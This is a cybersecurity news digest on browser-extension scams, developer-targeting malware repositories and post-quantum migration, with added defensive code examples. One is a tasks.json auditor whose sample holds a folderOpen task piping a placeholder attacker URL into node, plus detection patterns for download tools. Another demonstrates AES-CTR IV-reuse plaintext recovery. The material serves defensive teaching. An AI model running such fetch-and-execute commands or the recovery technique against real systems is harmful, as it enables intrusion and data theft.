Two newly flagged Google Chrome extensions, Pixel Shield - Block Ads (ID: nlogodaofdghipmbdclajkkpheneldjd) and PageGuard - Phishing Protection (ID: mlaonedihngoginmmlaacpihnojcoocl), have been found to adopt the same playbook as CrashFix, where the browser is deliberately crashed, and the user is tricked into running a malicious command à la ClickFix. The most concerning aspect of this campaign is that the extensions actually work and offer the advertised functionality. “The original NexShield DoS created a billion chrome.runtime.connect() calls,” Annex Security’s John Tuckner said. “These variants use a different technique I’m calling the Promise Bomb because it crashes the browser by flooding Chrome’s message passing system with millions of unresolvable promises.” While the original NexShield used timer-based activation, the new variants have evolved to push notification-based command-and-control (C2), causing the denial-of-service to be triggered only when the C2 server sends a push notification containing a “newVersion” value ending in “2.” This, in turn, gives the attacker selective remote control over when the crashes happen.

WinRAR patch lag persists: Widespread Exposure to CVE-2025-8088
Cybersecurity firm Stairwell said more than 80% of the IT networks it monitors run versions of WinRAR vulnerable to CVE-2025-8088, a vulnerability that has been widely exploited by cybercrime and cyber espionage groups. “This finding underscores a persistent challenge in enterprise security when widely deployed, trusted software that quietly falls out of date and becomes a high-value target for attackers,” Alex Hegyi said.

Crypto IV reuse risk: Open-Source Projects Use Crypto Libraries with Insecure Defaults
A new analysis from Trail of Bits has revealed that more than 723,000 open-source projects use cryptographic libraries with insecure defaults. The aes-js and pyaes libraries have been found to provide a default initialization vector (IV) in their AES-CTR API, leading to a large number of key/IV reuse bugs.
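The key/IV reuse problem above, as an added example that is not code from Trail of Bits, aes-js or pyaes: two messages encrypted with AES-CTR under the same key and a fixed IV share their keystream, so XORing the ciphertexts yields the XOR of the plaintexts, and a known first message gives away the second without the key. The fixed zero IV, the key and the sample messages are constructed stand-ins (the libraries' actual default values are not reproduced); the corrected form draws a fresh random IV per message and prepends it to the ciphertext.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
)

// demoKey is a constructed 32-byte AES-256 key for the demonstration only.
var demoKey = []byte("0123456789abcdef0123456789abcdef")

// defaultIV stands in for a library-supplied fixed IV (an assumption; the
// exact default of aes-js or pyaes is not reproduced here).
var defaultIV = make([]byte, aes.BlockSize)

// ctrEncrypt runs AES-CTR under key with an explicit IV. CTR is a stream
// mode: ciphertext = plaintext XOR keystream(key, iv), so the same call
// also decrypts.
func ctrEncrypt(key, iv, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(iv) != aes.BlockSize {
		return nil, errors.New("iv must be exactly one block (16 bytes)")
	}
	out := make([]byte, len(plaintext))
	cipher.NewCTR(block, iv).XORKeyStream(out, plaintext)
	return out, nil
}

// xorBytes returns a XOR b over the shorter of the two lengths.
func xorBytes(a, b []byte) []byte {
	n := len(a)
	if len(b) < n {
		n = len(b)
	}
	out := make([]byte, n)
	for i := 0; i < n; i++ {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// RecoverUnderIVReuse shows the failure mode: c1 and c2 were produced with
// the same key and IV, so c1 XOR c2 == p1 XOR p2. Holding both ciphertexts
// and one plaintext (or a good guess at it) yields the other plaintext
// without ever touching the key.
func RecoverUnderIVReuse(c1, c2, knownP1 []byte) []byte {
	return xorBytes(xorBytes(c1, c2), knownP1)
}

// SealCTR is the corrected usage: a fresh random IV per message, prepended
// to the ciphertext so the receiver can recover it.
func SealCTR(key, plaintext []byte) ([]byte, error) {
	iv := make([]byte, aes.BlockSize)
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return nil, err
	}
	ct, err := ctrEncrypt(key, iv, plaintext)
	if err != nil {
		return nil, err
	}
	return append(iv, ct...), nil
}

// OpenCTR reverses SealCTR.
func OpenCTR(key, sealed []byte) ([]byte, error) {
	if len(sealed) < aes.BlockSize {
		return nil, errors.New("sealed message shorter than one IV")
	}
	return ctrEncrypt(key, sealed[:aes.BlockSize], sealed[aes.BlockSize:])
}

func main() {
	p1 := []byte("transfer 100 EUR to account A") // constructed sample messages
	p2 := []byte("transfer 900 EUR to account B")
	c1, _ := ctrEncrypt(demoKey, defaultIV, p1)
	c2, _ := ctrEncrypt(demoKey, defaultIV, p2)
	leaked := RecoverUnderIVReuse(c1, c2, p1)
	fmt.Printf("IV reuse leaks p2: %q (match=%v)\n", leaked, bytes.Equal(leaked, p2))

	s1, _ := SealCTR(demoKey, p1)
	s2, _ := SealCTR(demoKey, p1)
	fmt.Println("same plaintext, fresh IVs, ciphertexts differ:", !bytes.Equal(s1, s2))
}
```

The same keystream-sharing argument applies to GCM, whose encryption layer is CTR mode, which is why the quoted warning names both modes.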

“Reusing a key/IV pair leads to serious security issues: if you encrypt two messages in CTR mode or GCM with the same key and IV, then anybody with access to the ciphertexts can recover the XOR of the plaintexts, and that’s a very bad thing,” Trail of Bits said. While neither library has been updated in years, strongSwan has released an update to address the problem in strongMan (CVE-2026-25998).

AI audits smart contracts: OpenAI Teams Up with Paradigm for EVMbench
OpenAI and Paradigm have jointly announced EVMbench, a benchmark that measures how well AI agents can detect, exploit, and patch high-severity smart contract vulnerabilities. “EVMbench draws on 120 curated vulnerabilities from 40 audits, with most sourced from open code audit competitions,” OpenAI said.

“EVMbench is intended both as a measurement tool and as a call to action. As agents improve, it becomes increasingly important for developers and security researchers to incorporate AI-assisted auditing into their workflows.”

Fake FSB extortion plot: Moscow Man Accused of Impersonating FSB to Extort Conti Gang
A Russian national has been accused of trying to extort money from the notorious Conti ransomware group by posing as an officer of Russia’s Federal Security Service (FSB), according to local media reports. RBC reported that the suspect, Ruslan Satuchin, posed as an FSB officer and demanded a large payment from Conti. Although an investigation was formally launched in September 2025, the incident allegedly began in September 2022 when Satuchin contacted one of the members of the hacker group and extorted them to avoid criminal liability.

Once a prolific ransomware gang, Conti shut down its operations in mid-2022 after splintering into small groups.

Ad cloaking service exposed: 1Campaign Service Helps Malicious Google Ads Evade Detection
Varonis has disclosed details of a newly identified cybercrime service known as 1Campaign that enables threat actors to run malicious Google Ads for extended periods of time while evading scrutiny. The cloaking platform “passes Google’s screening, filters out security researchers, and keeps phishing and crypto drainer pages online for as long as possible, funneling real users to attacker-controlled sites,” Varonis security researcher Daniel Kelley said. “It combines real-time visitor filtering, fraud scoring, geographic targeting, and a bot guard script generator into a single dashboard.” It has been developed and maintained for over three years by a threat actor named DuppyMeister, who also offers Telegram channels for support.

Traffic linked to 1Campaign has been distributed across the U.S., Canada, the Netherlands, China, Germany, France, Japan, Hungary, and Albania.

Teams call drops macOS malware: Social Engineering Using Teams Leads to macOS Malware
A social engineering campaign has been observed using Microsoft Teams meetings to trick attendees into installing macOS malware. Daylight Security has assessed that the activity is consistent with an ongoing attack campaign orchestrated by North Korean threat actors under the name GhostCall. “During the call, the attacker claimed audio issues and coached the victim into running terminal commands that downloaded and executed malicious binaries,” Daylight researchers Kyle Henson and Oren Biderman said.

“Analysts observed staged downloads and execution from macOS cache and temporary paths, Keychain credential access, and outbound connections to newly created attacker-controlled domains.”

RAMP fallout reshapes underground: What Happened Post RAMP Shutdown?
Last month, law enforcement authorities from the U.S. seized the notorious RAMP cybercrime forum. The event has had a cascading impact, destabilising trust and accelerating fragmentation across the underground cybercrime ecosystem.

There are also speculations that RAMP may have functioned as a honeypot or had been compromised long before its seizure. “Rather than consolidating around a single successor, ransomware actors are redistributing across both gated platforms like T1erOne and accessible forums such as Rehub,” Rapid7 said. “This shift reflects adaptation, not decline. Disruption fractures trust and redistributes coordination across multiple platforms.”

Anonymous Fénix members detained: Spain Arrests Suspected Hacktivists for DDoS Attacks
Spanish authorities have announced the arrest of four members of the Anonymous Fénix group for their involvement in distributed denial-of-service (DDoS) attacks.

The suspects, whose names were not disclosed, targeted the websites of government ministries, political parties, and public institutions. Two of the group leaders were arrested in May 2025. The first attacks occurred in April 2023. The group is said to have intensified its activities beginning in September 2024, recruiting volunteers to mount DDoS attacks against targets of interest.

Judicial spear-phish drops RAT: Argentina’s Judicial Sector Targeted by RAT Malware
A spear-phishing campaign has been observed targeting Argentina’s judicial sector that delivers a ZIP archive containing a Windows shortcut that, when launched, displays a decoy PDF to the victims, while stealthily dropping a Rust-based remote access trojan (RAT). “The campaign leverages highly authentic judicial decoy documents to exploit trust in court communications, enabling successful delivery of a covert remote access trojan and facilitating long-term access to sens itive legal and institutional data,” Seqrite Labs said.

Typosquat spreads ValleyRAT: Fake Huorong Website Drops ValleyRAT
A persuasive lookalike website of Huorong Security antivirus (“huoronga[.]com”) has been used to deliver a RAT malware known as ValleyRAT. The campaign is the work of a Chinese cybercrime group called Silver Fox, which has a history of using typosquatted domains to distribute trojanized installers of popular Chinese software and other widely used programs that deploy ValleyRAT.

“Once it’s installed, attackers can monitor the victim, steal sensitive information, and remotely control the system,” Malwarebytes said.

Repo-squatting via Google Ads: GPUGate Campaign Delivers Hijack Loader
Users searching for developer tools have become the target of an ongoing campaign dubbed GPUGate that uses a malicious installer to deliver Hijack Loader and Atomic Stealer. “The attacker creates a throwaway GitHub account and forks the official GitHub Desktop repository,” GMO Cybersecurity by Ierae said. “The attacker edits the download link in the README to point to their malicious installer and commits the change.

Lastly, the attacker used sponsored ads for ‘GitHub Desktop’ to promote their commit, using an anchor in README.md to skip past GitHub’s cautions.” Victims who downloaded the malicious Windows installer would execute a multi-stage loader, while Mac victims received Atomic Stealer.

These stories may seem separate, but they point in the same direction. Speed is increasing. Deception is improving.

And attackers are finding new ways to blend into everyday activity. The warning signs are there for those who look closely. Small gaps, delayed patches, misplaced trust, and rushed clicks still make the biggest difference. Staying aware of these shifts is no longer optional.

The details change each week. The pressure does not.

Expert Recommends: Prepare for PQC Right Now

Introduction: Steal It Today, Break It in a Decade
Digital evolution is unstoppable, and though the pace may vary, things tend to fall into place sooner rather than later. That, of course, applies to adversaries as well. The rise of ransomware and cyber extortion generated funding for a complex and highly professional criminal ecosystem. The era of the cloud brought general availability of almost infinite amounts of storage.

So there is literally nothing that stops criminals from stealing and trafficking heaps of data, be it encrypted or not. Patient adversaries are employing a “Harvest Now, Decrypt Later” (HNDL) strategy. They are quietly accumulating encrypted data with the intention of decrypting it later using quantum computers. Any data requiring long-term security, such as trade secrets or classified designs, is vulnerable because its lifespan will inevitably outlive its current encryption.

Therefore, it is crucial that organizations begin planning their PQC migration now, ensuring that data encrypted today remains secure against future quantum-enabled decryption attacks.

The Quantum Waiting Game
Cryptography is the backbone of digital trust, but the looming era of quantum computing threatens its foundations. Harnessing quantum physics, future quantum machines will effortlessly break the mathematical encryption schemes that protect data today. Current prototypes [1] are not quite there yet because they fundamentally lack the scale and error-correction capability required to successfully execute complex quantum algorithms.

However, the prospect of a mature, cryptographically relevant quantum computer (CRQC) is alarming. Such a machine could break modern encryption in a matter of minutes, and one is likely to exist by 2030 to 2035. To combat the looming quantum computing threat, our cryptography must evolve immediately. This is why Post-Quantum Cryptography (PQC) [2] is being introduced as a solution.

PQC provides new cryptographic algorithms designed to withstand attacks from both today’s classical computers and future quantum machines.

A Step-by-Step Guide to Future-Proofing with PQC
PQC migration is a complex process that spans the entire organization and potentially reaches deep into its security architecture. This massive transition is complicated by the current state of industry planning. There is still a lack of consensus in technical literature regarding common steps or uniform terminology for migration strategies.

Without a common language, companies find it difficult to effectively compare, adopt, or coordinate the most suitable migration strategies. Our research concludes that the following strategy offers an effective, universal framework that can be adapted to suit any organization. [3, 4, 5, 6, 7, 8, 9]


At this stage, it is important to emphasize that a migration team must be established for each migration.

This team should consist of cryptography and cybersecurity experts and managers from the software system or infrastructure being migrated. The team will drive the migration process forward and ensure its completion.

Step 1 (Preparation): This phase establishes the scope and leadership for the PQC migration process. Key activities include assessing the relevance and urgency of PQC, appointing a program lead, aligning stakeholders on clear goals, and initiating conversations with vendors to determine migration needs.

Step 2 (Diagnosis): This phase involves a thorough evaluation of the current cybersecurity posture to establish a comprehensive security baseline. Key activities include documenting all cryptographic assets, categorizing data based on their confidential lifespan, identifying suppliers of cryptographic tools to evaluate their PQC readiness, and conducting a formal risk assessment to generate a prioritized asset list based on principles such as Mosca’s theorem [12].

Step 3 (Planning): Once the urgency and scope are determined, this phase focuses on the “how” and “when”. It defines the migration strategy, creating a comprehensive business and technical plan and timeline based on the urgency and scope determined in previous steps.

Key activities involve appointing a dedicated migration manager to oversee the process and conducting a comprehensive cost estimate for the entire migration.

Step 4 (Execution): This critical phase involves executing the plan to establish a quantum-safe environment through careful technical implementation. Key activities include maintaining backward compatibility via a hybrid cryptographic approach, implementing recommended PQC primitives for key exchange and signatures, adjusting key sizes, and integrating cryptographic agility to ensure rapid adaptation with minimal service disruption.

Step 5 (Continuous Monitoring and Update): This final phase focuses on continuous vigilance after migration, recognizing the dynamic cryptographic landscape.

Key activities include routinely reviewing and updating the cryptographic inventory, conducting regular reviews of emerging threats to PQC schemes, performing proactive security audits and vulnerability assessments, and staying updated on the latest PQC advances to ensure timely system and software updates.

Addressing Key Challenges: A Practical Checklist
To ensure a successful PQC migration, organizations must proactively identify and mitigate key obstacles that could hinder progress. They must recognize that the transition involves navigating three interdependent categories of challenges.

Organizational challenges: These non-technical obstacles relate to people, strategic planning, internal governance, and coordination across the wider ecosystem, often complicated by a lack of urgency or qualified personnel.

PQC challenges: These stem directly from the immaturity of the new technology. Although we now have initial standards, such as ML-KEM and its implementation in protocols like TLS, a lack of standardization for a complete suite of algorithms and uncertainty in selecting and testing reliable PQC solutions remain major hurdles. The main issue is the lack of specific implementation guidelines, such as how to effectively deploy hybridization or agility mechanisms.

Code and Documentation challenges: These are technical hurdles caused by the inherent rigidity of existing IT infrastructure (legacy systems), the need for extensive code modification, and the complexity of implementing secure cryptographic changes.
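The hybridization that Step 4 prescribes and that the PQC challenges above say lacks implementation guidance, as an added example that is not part of the original article: a minimal X25519 plus ML-KEM-768 key exchange built only from Go's standard library (crypto/ecdh and crypto/mlkem, the latter available from Go 1.24), where both secrets are bound into one key so an attacker must break the classical and the post-quantum primitive. The concatenate-and-hash combiner and the suite label are assumptions for illustration, not the exact construction of TLS or any standard.

```go
package main

import (
	"crypto/ecdh"
	"crypto/mlkem"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// suiteLabel names the algorithm pair and is bound into the derived key (an
// agility hook): a successor suite can never derive the same key from the same secrets.
const suiteLabel = "x25519+mlkem768"

// ClientHello and ServerHello are the two handshake flights.
type ClientHello struct {
	ECDHPub []byte // client's X25519 public key
	KEMPub  []byte // client's ML-KEM-768 encapsulation key
}
type ServerHello struct {
	ECDHPub []byte // server's X25519 public key
	KEMCT   []byte // ML-KEM-768 ciphertext encapsulated to KEMPub
}

// Client keeps the ephemeral private keys of one handshake.
type Client struct {
	ecdhKey *ecdh.PrivateKey
	kemKey  *mlkem.DecapsulationKey768
}

// NewClient generates fresh X25519 and ML-KEM-768 key pairs.
func NewClient() (*Client, ClientHello, error) {
	ek, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return nil, ClientHello{}, err
	}
	dk, err := mlkem.GenerateKey768()
	if err != nil {
		return nil, ClientHello{}, err
	}
	return &Client{ecdhKey: ek, kemKey: dk}, ClientHello{ECDHPub: ek.PublicKey().Bytes(), KEMPub: dk.EncapsulationKey().Bytes()}, nil
}

// ServerRespond answers a ClientHello and returns the server's shared key.
func ServerRespond(h ClientHello) (ServerHello, []byte, error) {
	sk, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return ServerHello{}, nil, err
	}
	ssECDH, err := x25519(sk, h.ECDHPub)
	if err != nil {
		return ServerHello{}, nil, err
	}
	ek, err := mlkem.NewEncapsulationKey768(h.KEMPub)
	if err != nil {
		return ServerHello{}, nil, err
	}
	ssKEM, ct := ek.Encapsulate() // fresh KEM secret and the ciphertext that carries it
	reply := ServerHello{ECDHPub: sk.PublicKey().Bytes(), KEMCT: ct}
	return reply, combine(ssECDH, ssKEM), nil
}

// Finish derives the client's shared key from the server's reply.
func (c *Client) Finish(r ServerHello) ([]byte, error) {
	ssECDH, err := x25519(c.ecdhKey, r.ECDHPub)
	if err != nil {
		return nil, err
	}
	ssKEM, err := c.kemKey.Decapsulate(r.KEMCT)
	if err != nil {
		return nil, err
	}
	return combine(ssECDH, ssKEM), nil
}

// x25519 parses the peer's public key and runs the ECDH computation.
func x25519(priv *ecdh.PrivateKey, peer []byte) ([]byte, error) {
	pub, err := ecdh.X25519().NewPublicKey(peer)
	if err != nil {
		return nil, err
	}
	return priv.ECDH(pub)
}

// combine hashes the suite label and both secrets into one 32-byte key, so an
// attacker must break both X25519 and ML-KEM. Simplified combiner (assumption).
func combine(ssECDH, ssKEM []byte) []byte {
	h := sha256.New()
	h.Write([]byte(suiteLabel))
	h.Write(ssECDH)
	h.Write(ssKEM)
	return h.Sum(nil)
}

func main() {
	c, hello, _ := NewClient()
	reply, serverKey, _ := ServerRespond(hello)
	clientKey, _ := c.Finish(reply)
	fmt.Printf("hybrid keys agree: %x / %x\n", serverKey[:8], clientKey[:8])
}
```

Swapping the suite (for example to a future ML-KEM parameter set) touches only the key-generation, encapsulation and label lines, which is the kind of isolation the agility obstacle below asks designs to provide.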

The following breaks down the major obstacles to a successful PQC migration and offers solutions for each. Each obstacle falls under one of the previously established challenge categories. See references [71] and [11] for a more comprehensive discussion of additional obstacles.

Lack of Urgency and Business Case (Organizational): Problem: The quantum threat seems distant, making it challenging to establish a sense of urgency and budget approval from leadership.

Solution: Organizations can use tools like Mosca’s Theorem [12] to quantify their vulnerability and take inventory of cryptographic assets to improve current cybersecurity regardless of the quantum timeline.

Internal Knowledge and Skills Deficit (Organizational): Problem: Lack of internal knowledge about quantum-based threats, and a shortage of qualified personnel to implement new PQC solutions. Solution: Launch training initiatives for IT and management. Engage external PQC consultants to design the strategy and transfer knowledge.

Internal Governance and Planning (Organizational): Problem: Absence of PQC governance and a fully articulated transition plan, leading to ineffective task prioritization and operational inefficiencies. Solution: Appoint a PQC migration manager or steering committee to mandate a cryptographic inventory for risk-based migration prioritization.

Ecosystem and Coordination Failures (Organizational): Problem: Lack of ecosystem engagement, unclear governance, and limited collaboration hamper the PQC transition. Solution: Proactively manage vendor relationships and join industry forums to share knowledge, collaborate, and influence standards development.

Regulatory Voids (Organizational): Problem: Existing regulations (e.g. NIS2 and DORA) mandate the use of state-of-the-art cryptography while new PQC-specific laws are pending. Solution: Adopt recent PQC standards proactively for critical systems to meet the “state-of-the-art” requirement. Leverage EUCC certification and monitor ETSI/OpenSSL for implementation guidance.

Uncertain Selection Criteria (PQC): Problem: Organizations struggle to decide between an all-at-once replacement and a phased hybrid approach to adopting PQC, as they lack clear criteria. Solution: Default to a hybrid PQC model to gain operational knowledge and minimize complications before committing to a full replacement strategy.

Security and Reliability Concerns (PQC): Problem: Given the uncertainty about the maturity and security of PQC algorithms, organizations must balance present-day protection and future resilience. Solution: Use a hybrid PQC approach with a staged rollout.

Begin with non-critical areas before expanding to ensure the solution is stable and reliable.

Rigidity of Legacy Systems (Code and Documentation): Problem: Legacy systems are inflexible. This is exacerbated in resource-constrained devices, e.g. IoT and smart cards, which lack the memory and power necessary for larger PQC keys and intense computations.

Solution: Replace hardware to accommodate PQC demands. If this is not feasible, implement lightweight, optimized PQC libraries.

Ecosystem Interdependency (Code and Documentation): Problem: The interconnected nature of the Public Key Infrastructure (PKI) means that a PQC transition affects all involved parties, including standards bodies, hardware/software vendors, and certificate authorities (CAs). Solution: Collaborate with suppliers and CAs, participate in industry and regulatory groups (e.g., NIST, CISA, ENISA, ETSI, ANSSI, NCSC and BSI), and map all third-party component dependencies.

Lack of Certified and Approved Components (Code and Documentation): Problem: Limited availability of certified components (e.g., HSMs) from vendors, especially in regulated sectors such as finance and government. Solution: During procurement, organizations must mandate FIPS 140-3 or EUCC validation for PQC-capable hardware, while beginning software-level migration (e.g., TLS/SSH) in parallel.

Lack of Agility (Code and Documentation): Problem: Current systems are cryptographically inflexible. This makes adapting to new threats or evolving standards slow and complex due to the need for intricate code changes.

Solution: Prioritize cryptographic agility by designing new systems that allow for algorithm swapping via simple configuration and centralized key and certificate support.

Key Takeaways
Urgency of Migration: Act immediately! The deadline is now. The time for waiting for CRQC is over.

Organizations must start preparing and migrating their data immediately to ensure long-term security.

Establish Foundational Priorities: Strategic efforts must focus on developing a clear, actionable strategy for planning and executing the PQC transition smoothly.

Foster United Collaboration: The PQC transition demands a unified effort to address the collective security challenge. This requires actively sharing lessons learned and collaborating across industries, governments, and academia.

Embed Hybrid Cryptography and Cryptographic Agility: The ability to rapidly and seamlessly combine, modify or swap cryptographic primitives must be adopted as the cornerstone of the new security posture to adapt to future advances in quantum-safe standards.

Acknowledge Interdependent Challenges: The success of any PQC migration hinges on recognizing that the transition involves navigating several interdependent categories of challenges.

This is just an excerpt of the many topics covered in the Security Navigator 2026. For more in-depth articles on the use and abuse of Generative AI, Hacktivism and cybercrime, Vulnerability management and Cyber Extortion, as well as CyberSOC statistics and security predictions, you should check out the full report!

Head over to the download page and get a copy.

References:
[1] The Quantum Insider – Quantum Computing Roadmaps: A Look at the Maps and Predictions of Major Quantum Players
[2] cnlab – Post-Quantum Cryptography: A Comprehensive Guide
[3] ETSI – Migration Strategies and Recommendations for Quantum Safe Schemes
[4] NCSC – Timelines for Migration to Post-Quantum Cryptography
[5] Encryption Consulting – Enterprise Guide to PQC Migration
[6] NIST – Migration to Post-Quantum Cryptography: Preparation for Considering the Implementation and Adoption of Quantum Safe Cryptography
[7] arXiv – Identifying Research Challenges in Post Quantum Cryptography Migration and Cryptographic Agility
[8] CISA – Quantum-Readiness: Migration to Post-Quantum Cryptography
[9] BSI – Quantum-Safe Cryptography: Fundamentals, Current Developments and Recommendations
[10] Orange Cyberdefense – 8 Minutes to Stay in Control: Quantum and Security
[11] NXP – Post-Quantum Cryptographic Migration Challenges for Embedded Devices
[12] IEEE Security & Privacy – Cybersecurity in an Era with Quantum Computers: Will We Be Ready?

Note: This article was expertly written and contributed by Mohammed Meziani, Senior Security Consultant at Orange Cyberdefense.

This article is a contributed piece from one of our valued partners.

Microsoft Warns Developers of Fake Next.js Job Repos Delivering In-Memory Malware

A “coordinated developer-targeting campaign” is using malicious repositories disguised as legitimate Next.js projects and technical assessments to trick victims into executing them and establish persistent access to compromised machines. “The activity aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution,” the Microsoft Defender Security Research Team said in a report published this week. The tech giant said the campaign is characterized by the use of multiple entry points that lead to the same outcome, where attacker-controlled JavaScript is retrieved at runtime and executed to facilitate command-and-control (C2). The attacks rely on the threat actors setting up fake repositories on trusted developer platforms like Bitbucket, using names like “Cryptan-Platform-MVP1” to trick developers looking for jobs into running them as part of an assessment process.

Further analysis of the identified repositories has uncovered three distinct execution paths that, while triggered in different ways, have the end goal of executing attacker-controlled JavaScript directly in memory:

- Visual Studio Code workspace execution, where Microsoft Visual Studio Code (VS Code) projects with workspace automation configuration are used to run malicious code retrieved from a Vercel domain as soon as the developer opens and trusts the project. This involves configuring the task with runOn: "folderOpen".
- Build-time execution during application development, where manually running the development server via "npm run dev" is enough to activate the execution of malicious code embedded within modified JavaScript libraries masquerading as jquery.min.js, causing it to fetch a JavaScript loader hosted on Vercel. The retrieved payload is then executed in memory by Node.js.
- Server startup execution via environment exfiltration and dynamic remote code execution, where launching the application backend causes malicious loader logic concealed within a backend module or route file to be executed. The loader transmits the process environment to the external server and executes JavaScript received as a response in memory within the Node.js server process.

Microsoft noted that all three methods lead to the same JavaScript payload that's responsible for profiling the host and periodically polling a registration endpoint to get a unique "instanceId" identifier. This identifier is subsequently supplied in follow-on polls to correlate activity.
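As an added example (not code from Microsoft's report or from the repositories it describes), the following Python script audits a VS Code tasks.json for the auto-run pattern described above: a task with runOn: "folderOpen" whose command fetches remote content or pipes it into an interpreter. The sample tasks.json, the placeholder URL and the severity ranking are constructed assumptions.

```python
import json
import re

# Constructed sample tasks.json that mirrors the technique described above:
# a task that fires on folder open and pipes remote JavaScript into Node.
# The URL is a placeholder, not an indicator from the article.
SAMPLE_TASKS_JSON = """{
  "version": "2.0.0",
  "tasks": [
    {"label": "setup", "type": "shell",
     "command": "curl -s https://attacker-placeholder.example/loader.js | node",
     "runOptions": {"runOn": "folderOpen"}},
    {"label": "build", "type": "shell", "command": "npm run build"}
  ]
}"""

# Heuristics: anything that reaches the network, or pipes/evals text into an interpreter.
REMOTE_FETCH = re.compile(r"https?://|\b(curl|wget|iwr|Invoke-WebRequest)\b", re.I)
INLINE_EXEC = re.compile(r"\|\s*(sh|bash|node|python3?)\b|\bnode\s+-e\b|\beval\b", re.I)

def task_command_text(task):
    """Flatten command, args and per-OS overrides into one string for matching."""
    parts = []
    for scope in (task, task.get("windows", {}), task.get("linux", {}), task.get("osx", {})):
        parts.append(str(scope.get("command", "")))
        for arg in scope.get("args", []):
            parts.append(arg["value"] if isinstance(arg, dict) else str(arg))
    return " ".join(p for p in parts if p)

def audit_tasks(text):
    """Return findings for tasks that auto-run, fetch remote content, or exec piped input."""
    findings = []
    for task in json.loads(text).get("tasks", []):
        auto = task.get("runOptions", {}).get("runOn") == "folderOpen"
        cmd = task_command_text(task)
        remote, exec_ = bool(REMOTE_FETCH.search(cmd)), bool(INLINE_EXEC.search(cmd))
        if not (auto or remote or exec_):
            continue
        if auto and (remote or exec_):
            severity = "high"    # runs without a user action and pulls/executes code
        elif remote or exec_:
            severity = "medium"  # needs a manual trigger, but still fetches or evals
        else:
            severity = "low"     # auto-run with a local-looking command; still review it
        findings.append({"label": task.get("label"), "severity": severity, "auto_run": auto,
                         "remote_fetch": remote, "inline_exec": exec_, "command": cmd})
    return findings

if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_TASKS_JSON):
        print(f"[{f['severity']}] {f['label']}: {f['command']}")
```

VS Code only fires folderOpen tasks once the workspace is trusted, so the place for this check is before granting Workspace Trust to a repository received as an "assessment".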

It’s also capable of executing server-provided JavaScript in memory, ultimately paving the way for a second-stage controller that turns the initial foothold into a persistent access pathway for receiving tasks by contacting a different C2 server and executing them in memory to minimize leaving traces on disk.

Attack chain overview

“The controller maintains stability and session continuity, posts error telemetry to a reporting endpoint, and includes retry logic for resilience,” Microsoft said. “It also tracks spawned processes and can stop managed activity and exit cleanly when instructed. Beyond on-demand code execution, Stage 2 supports operator-driven discovery and exfiltration.” While the Windows maker did not attribute the activity to a specific threat actor, the use of VS Code tasks and Vercel domains to stage malware is a tactic that has been adopted by North Korea-linked hackers associated with a long-running campaign known as Contagious Interview.

The end goal of these efforts is to gain the ability to deliver malware to developer systems, which often contain sensitive data, such as source code, secrets, and credentials, that can provide opportunities to pivot deeper into the target network.

Using GitHub gists in VS Code tasks.json instead of Vercel URLs

In a report published Wednesday, Abstract Security said it has observed a shift in threat actor tactics, notably a spike in alternative staging servers used in the VS Code tasks commands instead of Vercel URLs. This includes the use of scripts hosted on GitHub gists (“gist.githubusercontent[.]com”) to download and run next-stage payloads. An alternative approach employs URL shorteners like short[.]gy to conceal Vercel URLs.

The cybersecurity company said it also identified a malicious npm package, named “eslint-validator,” linked to the campaign that retrieves and runs an obfuscated payload from a Google Drive URL. The payload in question is a known JavaScript malware referred to as BeaverTail. Furthermore, a malicious VS Code task embedded within a GitHub repository has been found to initiate a Windows-only infection chain that runs a batch script to download the Node.js runtime on the host (if it does not already exist) and leverage the certutil program to decode a code block contained within the script. The decoded script is then executed with the previously obtained Node.js runtime to deploy Python malware protected with PyArmor.

Cybersecurity company Red Asgard, which has also been extensively tracking the campaign, said the threat actors have leveraged crafted VS Code projects that use the runOn: "folderOpen" trigger to deploy malware that, in turn, queries the Polygon blockchain to retrieve JavaScript stored within an NFT contract for improved resilience. The final payload is an information stealer that harvests credentials and data from web browsers, cryptocurrency wallets, and password managers.

Distribution of staging infrastructure used by North Korean threat actors in 2025

“This developer-targeting campaign shows how a recruiting-themed ‘interview project’ can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend,” Microsoft concluded. To counter the threat, the company is recommending that organizations harden developer workflow trust boundaries, enforce strong authentication and conditional access, maintain strict credential hygiene, apply the principle of least privilege to developer accounts and build identities, and separate build infrastructure where feasible.

The development comes as GitLab said it banned 131 unique accounts in 2025 that were engaged in distributing malicious code projects linked to the Contagious Interview campaign and the fraudulent IT worker scheme known as Wagemole. “Threat actors typically originated from consumer VPNs when interacting with GitLab.com to distribute malware; however, they also intermittently originated from dedicated VPS infrastructure and likely laptop farm IP addresses,” GitLab’s Oliver Smith said. “Threat actors created accounts using Gmail email addresses in almost 90% of cases.” In more than 80% of the cases, per the software development platform, the threat actors are said to have leveraged at least six legitimate services to host malware payloads, including JSON Keeper, Mocki, npoint.io, Render, Railway.app, and Vercel. Among these, Vercel was the most commonly used, with the threat actors relying on the web development platform no less than 49 times in 2025.

“In December, we observed a cluster of projects executing malware via VS Code tasks, either piping remote content to a native shell or executing a custom script to decode malware from binary data in a fake font file,” Smith added, corroborating the aforementioned findings from Microsoft.

Assessed organization chart of the North Korean IT worker cell

Also discovered by GitLab was a private project “almost certainly” controlled by a North Korean national managing a North Korean IT worker cell that contained detailed financial and personnel records showing earnings of more than $1.64 million between Q1 2022 and Q3 2025. The project included more than 120 spreadsheets, presentations, and documents tracking quarterly income performance for individual team members. “Records demonstrate that these operations function as structured enterprises with defined targets and operating procedures and close hierarchical oversight,” GitLab noted.

“This cell’s demonstrated ability to cultivate facilitators globally provides a high degree of operational resiliency and money laundering flexibility.”

A GitHub account associated with a North Korean IT worker

